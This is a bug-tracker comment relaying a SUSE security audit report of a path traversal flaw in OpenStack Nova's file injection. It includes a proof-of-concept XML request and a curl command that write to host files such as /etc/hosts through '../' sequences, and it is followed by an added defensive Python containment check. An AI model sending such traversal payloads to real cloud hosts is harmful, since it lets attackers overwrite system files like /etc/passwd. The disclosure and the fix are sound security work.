Comment 0 for bug 1015531

Thierry Carrez (ttx) wrote :

Mathias Weckbecker from SUSE Security Team reported the following:

------------------
During our internal security audit efforts at SUSE for OpenStack, I have found
an issue in openstack-nova (compute).

Quoting from [1] (comment #1):

Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
[... snipped copy of utils.execute code ...]

It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.

Testcase (also from [1], comment #0):

mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://docs.openstack.org/compute/api/v1.1"
        imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
        flavorRef="6"
        name="new-server-test">
  <metadata>
    <meta key="My Server Name">foobar</meta>
  </metadata>
  <personality>
    <file path="../../../../../../../../../../../../../etc/hosts">
        ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
        dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
        IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
        c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
        QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
        ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
        dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
        c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
        b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
    </file>
  </personality>
</server>

mweckbecker@s3gfault:~$ curl -v \
    "http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers" \
    -H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15" \
    -H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml

Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.

[1] https://bugzilla.novell.com/show_bug.cgi?id=767687

Thanks, Matthias
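
Added example, not part of the original report and not Nova's own code or fix: a containment check that resolves each personality `<file path>` against the directory where the guest image is mounted and rejects any target that lands outside it. The names `resolve_inside`, `check_personality`, `PathEscapesRoot` and the shortened sample request are assumptions made for illustration.

```python
import os
import xml.etree.ElementTree as ET

NS = {"c": "http://docs.openstack.org/compute/api/v1.1"}

# Constructed request body modelled on the testcase above (file contents shortened).
SAMPLE_REQUEST = """<server xmlns="http://docs.openstack.org/compute/api/v1.1"
        flavorRef="6" name="new-server-test">
  <personality>
    <file path="../../../../../../../../etc/hosts">Zm9v</file>
    <file path="/etc/banner.txt">Zm9v</file>
  </personality>
</server>"""


class PathEscapesRoot(ValueError):
    """Raised when an injected file path resolves outside the mounted image."""


def resolve_inside(root, requested):
    """Return the host path for `requested` under `root`, or raise."""
    root = os.path.realpath(root)
    # Guest paths are relative to the mounted image, even with a leading "/".
    joined = os.path.join(root, requested.lstrip("/"))
    # realpath collapses ".." and follows symlinks planted inside the image.
    candidate = os.path.realpath(joined)
    if os.path.commonpath([root, candidate]) != root:
        raise PathEscapesRoot(requested)
    return candidate


def check_personality(xml_text, root):
    """Map each <file path=...> to its resolved target, or None if rejected."""
    results = {}
    for node in ET.fromstring(xml_text).iterfind("c:personality/c:file", NS):
        path = node.get("path")
        try:
            results[path] = resolve_inside(root, path)
        except PathEscapesRoot:
            results[path] = None
    return results


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as mount_dir:  # stand-in for the image mount
        for path, target in check_personality(SAMPLE_REQUEST, mount_dir).items():
            print(path, "->", target or "REJECTED")
```

Passing the joined path to a privileged helper such as `sudo tee` without this kind of check is what lets the `../` sequence in the testcase reach host files.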